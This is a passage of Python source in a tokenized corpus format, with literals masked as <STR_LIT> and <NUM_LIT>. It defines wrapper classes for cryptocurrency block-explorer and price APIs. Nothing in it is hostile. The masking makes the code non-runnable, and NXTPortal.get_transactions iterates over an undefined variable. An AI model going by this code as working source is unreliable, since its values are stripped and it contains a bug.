join ( addresses ) , crypto = crypto ) <EOL> balances = { } <EOL> for bal in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> balances [ bal [ '<STR_LIT:address>' ] ] = bal [ '<STR_LIT>' ] <EOL> return balances <EOL> def _format_tx ( self , tx , address ) : <EOL> return dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> addresses = [ address ] , <EOL> ) <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> transactions . append ( self . _format_tx ( tx , address ) ) <EOL> return transactions <EOL> def get_transactions_multi ( self , crypto , addresses , confirmation = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = '<STR_LIT:U+002C>' . join ( addresses ) , crypto = crypto ) <EOL> transactions = [ ] <EOL> for data in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> for tx in data [ '<STR_LIT>' ] : <EOL> transactions . append ( self . _format_tx ( tx , data [ '<STR_LIT:address>' ] ) ) <EOL> return transactions <EOL> def _format_single_tx ( self , tx ) : <EOL> ins = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT>' : float ( x [ '<STR_LIT>' ] ) * - <NUM_LIT:1> } for x in tx [ '<STR_LIT>' ] ] <EOL> outs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT>' : float ( x [ '<STR_LIT>' ] ) } for x in tx [ '<STR_LIT>' ] ] <EOL> return dict ( <EOL> time = arrow . get ( tx [ '<STR_LIT>' ] ) . 
datetime , <EOL> block_number = tx [ '<STR_LIT>' ] , <EOL> inputs = ins , <EOL> outputs = outs , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> total_in = sum ( x [ '<STR_LIT>' ] for x in ins ) , <EOL> total_out = sum ( x [ '<STR_LIT>' ] for x in outs ) , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) <EOL> ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = self . json_single_tx_url . format ( crypto = crypto , txid = txid ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return self . _format_single_tx ( r ) <EOL> def get_single_transaction_multi ( self , crypto , txids ) : <EOL> url = self . json_single_tx_url . format ( crypto = crypto , txid = '<STR_LIT:U+002C>' . join ( txids ) ) <EOL> txs = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> txs . append ( self . _format_single_tx ( tx ) ) <EOL> return txs <EOL> def _format_utxo ( self , utxo , address ) : <EOL> return dict ( <EOL> amount = currency_to_protocol ( utxo [ '<STR_LIT>' ] ) , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT:n>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = address , crypto = crypto ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( self . _format_utxo ( utxo , address ) ) <EOL> return utxos <EOL> def get_unspent_outputs_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = '<STR_LIT:U+002C>' . join ( addresses ) , crypto = crypto ) <EOL> utxos = [ ] <EOL> for data in self . get_url ( url ) . 
json ( ) [ '<STR_LIT:data>' ] : <EOL> for utxo in data [ '<STR_LIT>' ] : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( self . _format_utxo ( utxo , data [ '<STR_LIT:address>' ] ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % crypto <EOL> resp = self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . json ( ) <EOL> if resp [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( <EOL> resp [ '<STR_LIT:code>' ] , resp [ '<STR_LIT:data>' ] , resp [ '<STR_LIT:message>' ] <EOL> ) <EOL> ) <EOL> return resp [ '<STR_LIT:data>' ] <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , <EOL> block_hash if block_hash else '<STR_LIT>' , <EOL> block_number if block_number else '<STR_LIT>' , <EOL> '<STR_LIT>' if latest else '<STR_LIT>' <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . datetime , <EOL> sent_value = r [ '<STR_LIT>' ] , <EOL> total_fees = float ( r [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = r [ '<STR_LIT>' ] , <EOL> size = int ( r [ '<STR_LIT:size>' ] ) , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] , <EOL> tx_count = r [ '<STR_LIT>' ] , <EOL> ) <EOL> class Toshi ( Service ) : <EOL> api_homepage = "<STR_LIT>" <EOL> service_id = <NUM_LIT:6> <EOL> url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . 
json ( ) <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> to_iterate = response [ '<STR_LIT>' ] + response [ '<STR_LIT>' ] <EOL> else : <EOL> to_iterate = response [ '<STR_LIT>' ] <EOL> transactions = [ ] <EOL> for tx in to_iterate : <EOL> if tx [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> amount = sum ( [ x [ '<STR_LIT>' ] / <NUM_LIT> for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> utxos = [ ] <EOL> for utxo in response : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> amount = utxo [ '<STR_LIT>' ] , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = cons <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . url , tx_hex ) <EOL> return self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % self . url <EOL> else : <EOL> url = "<STR_LIT>" % ( <EOL> self . url , block_hash if block_hash else '<STR_LIT>' , <EOL> block_number if block_number else '<STR_LIT>' <EOL> ) <EOL> r = self . get_url ( url ) . 
json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> sent_value = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> total_fees = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> mining_difficulty = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] if len ( r [ '<STR_LIT>' ] ) else None , <EOL> txids = sorted ( r [ '<STR_LIT>' ] ) , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> class BTCE ( Service ) : <EOL> service_id = <NUM_LIT:7> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> pair = "<STR_LIT>" % ( crypto . lower ( ) , fiat . lower ( ) ) <EOL> url = "<STR_LIT>" + pair <EOL> response = self . get_url ( url ) . json ( ) <EOL> return response [ pair ] [ '<STR_LIT>' ] <EOL> class Cryptonator ( Service ) : <EOL> service_id = <NUM_LIT:8> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> pair = "<STR_LIT>" % ( crypto , fiat ) <EOL> url = "<STR_LIT>" % pair <EOL> response = self . get_url ( url ) . json ( ) <EOL> return float ( response [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> class Winkdex ( Service ) : <EOL> service_id = <NUM_LIT:9> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> if fiat != '<STR_LIT>' : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> return self . get_url ( url ) . 
json ( ) [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> class ChainSo ( Service ) : <EOL> service_id = <NUM_LIT:11> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , fiat ) <EOL> resp = self . get_url ( url ) . json ( ) <EOL> items = resp [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> if len ( items ) == <NUM_LIT:0> : <EOL> raise SkipThisService ( "<STR_LIT>" % ( crypto , fiat ) ) <EOL> self . name = "<STR_LIT>" % items [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return float ( items [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . base_url , crypto , address , confirmations <EOL> ) <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , address ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> tx_cons = int ( tx [ '<STR_LIT>' ] ) <EOL> if tx_cons < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> amount = float ( tx [ '<STR_LIT:value>' ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx_cons , <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> utxos . 
append ( dict ( <EOL> amount = currency_to_protocol ( utxo [ '<STR_LIT:value>' ] ) , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto ) <EOL> resp = self . post_url ( url , { '<STR_LIT>' : tx_hex } ) <EOL> return resp . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> else : <EOL> url = "<STR_LIT>" % ( <EOL> self . base_url , crypto , block_number , block_hash <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> sent_value = float ( r [ '<STR_LIT>' ] ) , <EOL> total_fees = float ( r [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = float ( r [ '<STR_LIT>' ] ) , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] , <EOL> txids = sorted ( [ t [ '<STR_LIT>' ] for t in r [ '<STR_LIT>' ] ] ) <EOL> ) <EOL> class CoinPrism ( Service ) : <EOL> service_id = <NUM_LIT:12> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = None ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> resp = self . get_url ( url ) . json ( ) <EOL> return resp [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . 
base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) : <EOL> transactions . append ( dict ( <EOL> amount = sum ( [ x [ '<STR_LIT:value>' ] / <NUM_LIT> for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) : <EOL> if address in tx [ '<STR_LIT>' ] : <EOL> transactions . append ( dict ( <EOL> amount = tx [ '<STR_LIT:value>' ] , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( tx [ '<STR_LIT>' ] , tx [ '<STR_LIT>' ] ) , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" <EOL> return self . post_url ( url , tx_hex ) . content <EOL> class BitEasy ( Service ) : <EOL> """<STR_LIT>""" <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" + address <EOL> response = self . get_url ( url ) <EOL> return response . 
json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] / <NUM_LIT> <EOL> class BlockChainInfo ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) * <NUM_LIT> <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> if response . content == '<STR_LIT>' : <EOL> return [ ] <EOL> utxos = [ ] <EOL> for utxo in response . json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> address = address , <EOL> ) ) <EOL> return utxos <EOL> class BitcoinAbe ( Service ) : <EOL> service_id = <NUM_LIT:15> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . base_url + "<STR_LIT>" + address <EOL> response = self . get_url ( url ) <EOL> return float ( response . 
content ) <EOL> class DogeChainInfo ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class AuroraCoinEU ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = '<STR_LIT>' <EOL> name = "<STR_LIT>" <EOL> class Atorox ( BitcoinAbe ) : <EOL> service_id = <NUM_LIT:20> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class FeathercoinCom ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % address <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) <EOL> class NXTPortal ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = '<STR_LIT>' + address <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT>' ] ) * <NUM_LIT> <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = '<STR_LIT>' % address <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in txs : <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . 
datetime , <EOL> amount = tx [ '<STR_LIT:value>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> class CryptoID ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> api_key = "<STR_LIT>" <EOL> supported_cryptos = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , address , self . api_key <EOL> ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , txid , self . api_key <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . 
datetime , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in r [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in r [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> total_in = r [ '<STR_LIT>' ] , <EOL> total_out = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , address , self . api_key <EOL> ) <EOL> resp = self . get_url ( url ) <EOL> if resp . status_code != <NUM_LIT:200> : <EOL> raise Exception ( "<STR_LIT>" % resp . content ) <EOL> ret = [ ] <EOL> for utxo in resp . json ( ) [ '<STR_LIT>' ] : <EOL> ret . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = int ( utxo [ '<STR_LIT:value>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = address <EOL> ) ) <EOL> return ret <EOL> class CryptapUS ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( crypto , address ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> class BTER ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> url_template = "<STR_LIT>" <EOL> url = url_template % ( crypto , fiat ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if response [ '<STR_LIT:result>' ] == '<STR_LIT:false>' : <EOL> url = url_template % ( crypto , '<STR_LIT>' ) <EOL> response = self . 
get_url ( url ) <EOL> altcoin_btc = float ( response [ '<STR_LIT>' ] ) <EOL> url = url_template % ( '<STR_LIT>' , fiat ) <EOL> response = self . get_url ( url ) <EOL> btc_fiat = float ( response [ '<STR_LIT>' ] ) <EOL> self . name = '<STR_LIT>' <EOL> return ( btc_fiat * altcoin_btc ) <EOL> return float ( response [ '<STR_LIT>' ] or <NUM_LIT:0> ) <EOL> class BitpayInsight ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> protocol = '<STR_LIT>' <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> return float ( self . get_url ( url ) . content ) / <NUM_LIT> <EOL> def _format_tx ( self , tx , addresses ) : <EOL> matched_addresses = [ ] <EOL> my_outs = <NUM_LIT:0> <EOL> my_ins = <NUM_LIT:0> <EOL> for address in addresses : <EOL> for x in tx [ '<STR_LIT>' ] : <EOL> if address in x [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> my_outs += float ( x [ '<STR_LIT:value>' ] ) <EOL> matched_addresses . append ( address ) <EOL> for x in tx [ '<STR_LIT>' ] : <EOL> if address in x [ '<STR_LIT>' ] : <EOL> my_ins += float ( x [ '<STR_LIT:value>' ] ) <EOL> matched_addresses . append ( address ) <EOL> return dict ( <EOL> amount = my_outs - my_ins , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> addresses = list ( set ( matched_addresses ) ) <EOL> ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT>' ] : <EOL> transactions . append ( self . 
_format_tx ( tx , [ address ] ) ) <EOL> return transactions <EOL> def get_transactions_multi ( self , crypto , addresses ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , '<STR_LIT:U+002C>' . join ( addresses ) ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> txs = [ ] <EOL> for tx in r [ '<STR_LIT>' ] : <EOL> txs . append ( self . _format_tx ( tx , addresses ) ) <EOL> return txs <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , txid ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = d [ '<STR_LIT>' ] , <EOL> total_in = float ( d [ '<STR_LIT>' ] ) , <EOL> total_out = float ( d [ '<STR_LIT>' ] ) , <EOL> fee = d [ '<STR_LIT>' ] , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> ) <EOL> def _format_utxo ( self , utxo ) : <EOL> return dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = currency_to_protocol ( utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = utxo [ '<STR_LIT:address>' ] <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) : <EOL> utxos . append ( self . _format_utxo ( utxo ) ) <EOL> return utxos <EOL> def get_unspent_outputs_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , '<STR_LIT:U+002C>' . 
